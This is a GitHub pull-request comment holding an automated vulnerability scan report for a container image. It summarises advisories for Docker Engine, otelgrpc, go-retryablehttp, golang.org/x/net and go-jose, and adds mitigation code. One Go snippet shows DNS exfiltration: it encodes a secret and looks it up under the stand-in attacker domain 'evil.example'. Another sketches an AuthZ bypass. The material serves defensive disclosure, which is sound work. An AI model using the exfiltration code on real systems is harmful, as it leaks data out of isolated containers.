Added custom releases to fix (missing) versioning #6336
Conversation
🔍 Vulnerabilities of
digest | sha256:b112fbce1ef4927c90e9b7b7295c849769b05595061c7631d07f95e62bb1d209 |
vulnerabilities | |
platform | linux/amd64 |
size | 36 MB |
packages | 309 |
github.com/docker/docker
Affected range | >=24.0.0 |
Fixed version | 26.1.4 |
CVSS Score | 9.9 |
CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H |
Description
A security vulnerability has been detected in certain versions of Docker Engine, which could allow an attacker to bypass authorization plugins (AuthZ) under specific circumstances. The base likelihood of this being exploited is low. This advisory outlines the issue, identifies the affected versions, and provides remediation steps for impacted users.
Impact
Using a specially-crafted API request, an Engine API client could make the daemon forward the request or response to an authorization plugin without the body. In certain circumstances, the authorization plugin may allow a request which it would have otherwise denied if the body had been forwarded to it.
A security issue was discovered in 2018, where an attacker could bypass AuthZ plugins using a specially crafted API request. This could lead to unauthorized actions, including privilege escalation. Although this issue was fixed in Docker Engine v18.09.1 in January 2019, the fix was not carried forward to later major versions, resulting in a regression. Anyone who depends on authorization plugins that introspect the request and/or response body to make access control decisions is potentially impacted.
Docker EE v19.03.x and all versions of Mirantis Container Runtime are not vulnerable.
Vulnerability details
- AuthZ bypass and privilege escalation: An attacker could exploit a bypass using an API request with Content-Length set to 0, causing the Docker daemon to forward the request without the body to the AuthZ plugin, which might approve the request incorrectly (see the sketch after this list).
- Initial fix: The issue was fixed in Docker Engine v18.09.1 in January 2019.
- Regression: The fix was not included in Docker Engine v19.03 or newer versions. This was identified in April 2024 and patches were released for the affected versions on July 23, 2024. The issue was assigned CVE-2024-41110.
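To illustrate why a missing body defeats such a plugin, here is a hypothetical sketch (not the Docker AuthZ plugin API) of a policy check that introspects the request body: when the daemon forwards a crafted Content-Length: 0 request without its body, the inspection never sees the dangerous payload and the request is allowed. All names and the JSON field checked are illustrative.

```go
package main

import (
	"bytes"
	"fmt"
	"io"
	"net/http"
)

// allowRequest is a hypothetical body-introspecting policy check. A real AuthZ
// plugin receives the forwarded body from the daemon; if the daemon forwards
// an empty body (as with a crafted Content-Length: 0 request), the dangerous
// field is never seen and the request slips through.
func allowRequest(r *http.Request) bool {
	body, err := io.ReadAll(r.Body)
	if err != nil {
		return false
	}
	// Deny privileged containers based on the (possibly absent) JSON body.
	if bytes.Contains(body, []byte(`"Privileged":true`)) {
		return false
	}
	return true
}

func main() {
	// A request whose body never reaches the policy check.
	req, _ := http.NewRequest(http.MethodPost, "/containers/create",
		bytes.NewReader(nil)) // body stripped before the plugin sees it
	fmt.Println("allowed:", allowRequest(req)) // true: nothing left to inspect
}
```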
Patches
- docker-ce v27.1.1 contains patches to fix the vulnerability.
- Patches have also been merged into the master, 19.03, 20.10, 23.0, 24.0, 25.0, 26.0, and 26.1 release branches.
Remediation steps
- If you are running an affected version, update to the most recent patched version.
- Mitigation if unable to update immediately:
- Avoid using AuthZ plugins.
- Restrict access to the Docker API to trusted parties, following the principle of least privilege.
Incorrect Resource Transfer Between Spheres
Affected range | >=25.0.0 |
Fixed version | 25.0.5 |
CVSS Score | 5.9 |
CVSS Vector | CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N |
Description
Moby is an open source container framework originally developed by Docker Inc. as Docker. It is a key component of Docker Engine, Docker Desktop, and other distributions of container tooling or runtimes. As a batteries-included container runtime, Moby comes with a built-in networking implementation that enables communication between containers, and between containers and external resources.
Moby's networking implementation allows for creating and using many networks, each with their own subnet and gateway. This feature is frequently referred to as custom networks, as each network can have a different driver, set of parameters, and thus behaviors. When creating a network, the `--internal` flag is used to designate a network as internal. The `internal` attribute in a docker-compose.yml file may also be used to mark a network internal, and other API clients may specify the `internal` parameter as well.
When containers with networking are created, they are assigned unique network interfaces and IP addresses (typically from a non-routable RFC 1918 subnet). The root network namespace (hereafter referred to as the 'host') serves as a router for non-internal networks, with a gateway IP that provides SNAT/DNAT to/from container IPs.
Containers on an internal network may communicate between each other, but are precluded from communicating with any networks the host has access to (LAN or WAN) as no default route is configured, and firewall rules are set up to drop all outgoing traffic. Communication with the gateway IP address (and thus appropriately configured host services) is possible, and the host may communicate with any container IP directly.
In addition to configuring the Linux kernel's various networking features to enable container networking, `dockerd` directly provides some services to container networks. Principal among these is serving as a resolver, enabling service discovery (looking up other containers on the network by name), and resolution of names from an upstream resolver.
When a DNS request for a name that does not correspond to a container is received, the request is forwarded to the configured upstream resolver (by default, the host's configured resolver). This request is made from the container network namespace: the level of access and routing of traffic is the same as if the request was made by the container itself.
As a consequence of this design, containers solely attached to internal network(s) will be unable to resolve names using the upstream resolver, as the container itself is unable to communicate with that nameserver. Only the names of containers also attached to the internal network are able to be resolved.
Many systems will run a local forwarding DNS resolver, typically present on a loopback address (`127.0.0.0/8`), such as systemd-resolved or dnsmasq. Common loopback address examples include `127.0.0.1` or `127.0.0.53`. As the host and any containers have separate loopback devices, a consequence of the design described above is that containers are unable to resolve names from the host's configured resolver, as they cannot reach these addresses on the host loopback device.
To bridge this gap, and to allow containers to properly resolve names even when a local forwarding resolver is used on a loopback address, `dockerd` will detect this scenario and instead forward DNS requests from the host/root network namespace. The loopback resolver will then forward the requests to its configured upstream resolvers, as expected.
Impact
Because `dockerd` will forward DNS requests to the host loopback device, bypassing the container network namespace's normal routing semantics entirely, internal networks can unexpectedly forward DNS requests to an external nameserver.
By registering a domain for which they control the authoritative nameservers, an attacker could arrange for a compromised container to exfiltrate data by encoding it in DNS queries that will eventually be answered by their nameservers. For example, if the domain `evil.example` was registered, the authoritative nameserver(s) for that domain could (eventually and indirectly) receive a request for `this-is-a-secret.evil.example`.
Docker Desktop is not affected, as Docker Desktop always runs an internal resolver on an RFC 1918 address.
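To make that exfiltration path concrete, the following is a minimal sketch of what a compromised workload could do: encode data into a subdomain of an attacker-controlled zone and trigger an ordinary lookup, which a vulnerable daemon would forward from the host namespace. The domain follows the advisory's `evil.example` example; the secret and encoding are illustrative.

```go
package main

import (
	"encoding/base32"
	"fmt"
	"net"
)

func main() {
	secret := []byte("db-password-123")

	// Encode the payload into a DNS-safe label and look it up under an
	// attacker-controlled zone. On a vulnerable engine, a container on an
	// internal network still gets this query forwarded to the upstream
	// resolver via the host, and the zone's authoritative nameserver
	// eventually sees the encoded data.
	label := base32.StdEncoding.WithPadding(base32.NoPadding).EncodeToString(secret)
	name := fmt.Sprintf("%s.evil.example", label)

	if _, err := net.LookupHost(name); err != nil {
		// The lookup will usually fail (NXDOMAIN); the query itself is the leak.
		fmt.Println("lookup finished:", err)
	}
}
```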
Patches
Moby releases 26.0.0-rc3, 25.0.5 (released) and 23.0.11 (to be released) are patched to prevent forwarding DNS requests from internal networks.
Workarounds
- Run containers intended to be solely attached to internal networks with a custom upstream address (the `--dns` argument to `docker run`, or the API equivalent), which will force all upstream DNS queries to be resolved from the container network namespace, as shown in the sketch below.
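As an illustration of the "API equivalent", here is a hedged sketch using the Go Docker SDK (github.com/docker/docker/client): setting `HostConfig.DNS` pins the container's upstream resolver so queries are made from the container's own network namespace. The image name, resolver address, and container name are placeholders, and error handling is minimal.

```go
package main

import (
	"context"
	"log"

	"github.com/docker/docker/api/types/container"
	"github.com/docker/docker/client"
)

func main() {
	cli, err := client.NewClientWithOpts(client.FromEnv, client.WithAPIVersionNegotiation())
	if err != nil {
		log.Fatal(err)
	}
	defer cli.Close()

	// Setting a custom DNS server forces upstream lookups to be made from the
	// container's network namespace instead of the host's, so an internal
	// network cannot leak queries via the host's loopback resolver.
	resp, err := cli.ContainerCreate(context.Background(),
		&container.Config{Image: "alpine"},                 // placeholder image
		&container.HostConfig{DNS: []string{"10.0.0.53"}},  // placeholder resolver
		nil, nil, "internal-only-app")
	if err != nil {
		log.Fatal(err)
	}
	log.Println("created container", resp.ID)
}
```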
Background
- Yair Zak originally reported this issue to the Docker security team.
- PR moby/moby#46609 ("libnet: Don't forward to upstream resolvers on internal nw") was opened in public to fix this issue, as it was not originally considered to have a security implication.
- The official documentation claims that the `--internal` flag "will completely isolate containers on a network from any communications external to that network," which necessitated this advisory and CVE.
go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc 0.45.0
(golang)
pkg:golang/go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc@0.45.0
Allocation of Resources Without Limits or Throttling
Affected range | <0.46.0 |
Fixed version | 0.46.0 |
CVSS Score | 7.5 |
CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H |
Description
Summary
The grpc Unary Server Interceptor in opentelemetry-go-contrib/instrumentation/google.golang.org/grpc/otelgrpc/interceptor.go

```go
// UnaryServerInterceptor returns a grpc.UnaryServerInterceptor suitable
// for use in a grpc.NewServer call.
func UnaryServerInterceptor(opts ...Option) grpc.UnaryServerInterceptor {
```

out of the box adds the labels `net.peer.sock.addr` and `net.peer.sock.port`, which have unbounded cardinality. This can lead to memory exhaustion on the server when many malicious requests are sent.
Details
An attacker can easily flood the peer address and port for requests.
PoC
Apply the attached patch to the example and run the client multiple times. Observe how each request creates a unique histogram and how memory consumption increases while it runs.
Impact
In order to be affected, the program has to configure a metrics pipeline, use UnaryServerInterceptor, and not filter client IP addresses and ports via middleware, proxies, etc.
Others
It is similar to already reported vulnerabilities.
- GHSA-5r5m-65gx-7vrh (open-telemetry/opentelemetry-go-contrib)
- GHSA-cg3q-j54f-5p7p (prometheus/client_golang)
Workaround for affected versions
As a workaround, a metrics view that removes the attributes can be used.
The other possibility is to disable grpc metrics instrumentation by passing the `otelgrpc.WithMeterProvider` option with `noop.NewMeterProvider`.
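For the second workaround, here is a minimal sketch of wiring the interceptor with a no-op meter provider so no metrics (and thus no unbounded attributes) are recorded; the surrounding server setup is illustrative.

```go
package main

import (
	"google.golang.org/grpc"

	"go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc"
	"go.opentelemetry.io/otel/metric/noop"
)

func main() {
	// Passing a no-op MeterProvider disables the gRPC metrics instrumentation,
	// so the high-cardinality net.peer.sock.* attributes are never recorded.
	srv := grpc.NewServer(
		grpc.UnaryInterceptor(
			otelgrpc.UnaryServerInterceptor(
				otelgrpc.WithMeterProvider(noop.NewMeterProvider()),
			),
		),
	)
	_ = srv // register services and call srv.Serve(listener) as usual
}
```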
Solution provided by upgrading
In PR #4322, to be released with v0.46.0, the attributes were removed.
github.com/hashicorp/go-retryablehttp 0.7.4
(golang)
pkg:golang/github.com/hashicorp/go-retryablehttp@0.7.4
Insertion of Sensitive Information into Log File
Affected range | <0.7.7 |
Fixed version | 0.7.7 |
CVSS Score | 6 |
CVSS Vector | CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N |
Description
go-retryablehttp prior to 0.7.7 did not sanitize URLs when writing them to its log file. This could lead to go-retryablehttp writing sensitive HTTP basic auth credentials to its log file. This vulnerability, CVE-2024-6104, was fixed in go-retryablehttp 0.7.7.
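The underlying problem is that request URLs can embed basic auth credentials (https://user:pass@host/...) and were logged verbatim. As a hedged illustration of the kind of sanitization the fix performs, the standard library's `(*url.URL).Redacted` masks the password before a URL reaches a log line; this is a generic sketch, not the library's actual patch.

```go
package main

import (
	"fmt"
	"log"
	"net/url"
)

func main() {
	// A request URL carrying HTTP basic auth credentials.
	u, err := url.Parse("https://user:s3cr3t@api.example.com/v1/items")
	if err != nil {
		log.Fatal(err)
	}

	// Redacted replaces the password with "xxxxx", so the credential never
	// reaches the log output.
	fmt.Println("unsafe:", u.String())   // contains the secret
	fmt.Println("safe:  ", u.Redacted()) // https://user:xxxxx@api.example.com/v1/items
}
```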
golang.org/x/net 0.17.0
(golang)
pkg:golang/golang.org/x/net@0.17.0
Uncontrolled Resource Consumption
Affected range | <0.23.0 |
Fixed version | 0.23.0 |
CVSS Score | 5.3 |
CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L |
Description
An attacker may cause an HTTP/2 endpoint to read arbitrary amounts of header data by sending an excessive number of CONTINUATION frames. Maintaining HPACK state requires parsing and processing all HEADERS and CONTINUATION frames on a connection. When a request's headers exceed MaxHeaderBytes, no memory is allocated to store the excess headers, but they are still parsed. This permits an attacker to cause an HTTP/2 endpoint to read arbitrary amounts of header data, all associated with a request which is going to be rejected. These headers can include Huffman-encoded data which is significantly more expensive for the receiver to decode than for an attacker to send. The fix sets a limit on the amount of excess header frames we will process before closing a connection.
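Since the fix lives inside golang.org/x/net, the practical question for operators is which version a deployed binary was built against. The following sketch (not part of the advisory) reads the binary's own build info to report the resolved golang.org/x/net version; versions below 0.23.0 fall in the affected range.

```go
package main

import (
	"fmt"
	"runtime/debug"
)

func main() {
	// ReadBuildInfo exposes the module versions compiled into this binary.
	info, ok := debug.ReadBuildInfo()
	if !ok {
		fmt.Println("no build info available (not built with module support)")
		return
	}
	for _, dep := range info.Deps {
		// Report the resolved version of golang.org/x/net.
		if dep.Path == "golang.org/x/net" {
			fmt.Printf("%s %s\n", dep.Path, dep.Version)
		}
	}
}
```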
gopkg.in/square/go-jose.v2 2.6.0
(golang)
pkg:golang/gopkg.in/square/go-jose.v2@2.6.0
Improper Handling of Highly Compressed Data (Data Amplification)
Affected range | <=2.6.0 |
Fixed version | Not Fixed |
CVSS Score | 4.3 |
CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L |
Description
Impact
An attacker could send a JWE containing compressed data that used large amounts of memory and CPU when decompressed by Decrypt or DecryptMulti. Those functions now return an error if the decompressed data would exceed 250kB or 10x the compressed size (whichever is larger). Thanks to Enze Wang@Alioth and Jianjun Chen@Zhongguancun Lab (@zer0yu and @chenjj) for reporting.
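The mitigation described above caps decompressed plaintext at the larger of 250 kB or 10x the compressed size. The snippet below is a generic sketch of that bounding technique using only the standard library; the helper name and the flat 250 kB limit are illustrative, not go-jose's actual implementation.

```go
package main

import (
	"bytes"
	"compress/flate"
	"errors"
	"fmt"
	"io"
)

// decompressBounded inflates DEFLATE data but refuses to expand beyond maxOut
// bytes, preventing a small ciphertext from ballooning into huge plaintext.
func decompressBounded(compressed []byte, maxOut int64) ([]byte, error) {
	r := flate.NewReader(bytes.NewReader(compressed))
	defer r.Close()

	// Read at most maxOut+1 bytes; anything beyond the limit means the input
	// amplifies past the allowed budget.
	out, err := io.ReadAll(io.LimitReader(r, maxOut+1))
	if err != nil {
		return nil, err
	}
	if int64(len(out)) > maxOut {
		return nil, errors.New("decompressed data exceeds limit")
	}
	return out, nil
}

func main() {
	// Compress a small payload, then decompress with a 250 kB cap.
	var buf bytes.Buffer
	w, _ := flate.NewWriter(&buf, flate.DefaultCompression)
	w.Write([]byte("hello, bounded decompression"))
	w.Close()

	out, err := decompressBounded(buf.Bytes(), 250<<10)
	fmt.Println(string(out), err)
}
```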
Patches
The problem is fixed in the following packages and versions:
- github.com/go-jose/go-jose/v4 version 4.0.1
- github.com/go-jose/go-jose/v3 version 3.0.3
- gopkg.in/go-jose/go-jose.v2 version 2.6.3
The problem will not be fixed in the following package because the package is archived:
- gopkg.in/square/go-jose.v2
Attempting automerge. See https://github.com/uniget-org/tools/actions/runs/10249361146.